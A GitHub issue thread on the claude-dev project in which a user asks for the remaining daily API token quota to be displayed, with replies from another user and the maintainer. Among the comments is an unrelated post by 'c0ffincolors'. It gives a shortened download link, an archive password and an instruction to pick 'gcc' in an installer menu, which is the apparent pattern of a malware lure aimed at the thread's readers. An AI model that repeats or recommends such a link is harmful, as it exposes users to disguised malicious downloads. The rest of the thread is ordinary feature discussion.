### ISSUE TITLE
[Feature Request]: Provide Remaining Daily Tokens Quantity in Output

### ISSUE THREAD

**Issue by matznerd** [saoudrizwan/claude-dev#186]
Hi, since Claude seems to limit tokens daily depending on account from 1m - 5m - 50m it would be useful to notify the users how many remaining Tokens Per Day (TPD) they have left after the tasks. At least as an option would be cool. Thanks

Here is the page with the calls and Tiers: https://docs.anthropic.com/en/api/rate-limits
![Tier 2](https://github.com/user-attachments/assets/caa184f7-69d5-4f30-8d97-7aa60bd3321b)
![API for tokens remaining](https://github.com/user-attachments/assets/f71fc318-e082-4942-9e3d-6f49df4a68cd)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by randomName5577** [comment]
yeah, that would be good to know since they provide the data. Even the retry-after

**Comment by saoudrizwan** [comment]
This is a great idea! Even open router has an endpoint about rate limits I could add as well.

**Comment by saoudrizwan** [comment]
If this is still something you'd like to see added, please feel free to add it in the [ideas board](https://github.com/saoudrizwan/claude-dev/discussions/categories/ideas) so people can vote on it. Thank you

**Comment by saoudrizwan** [comment]
Although I recommend using OpenRouter if you're running into rate limit issues, they now support prompt caching and have very generous rate limits
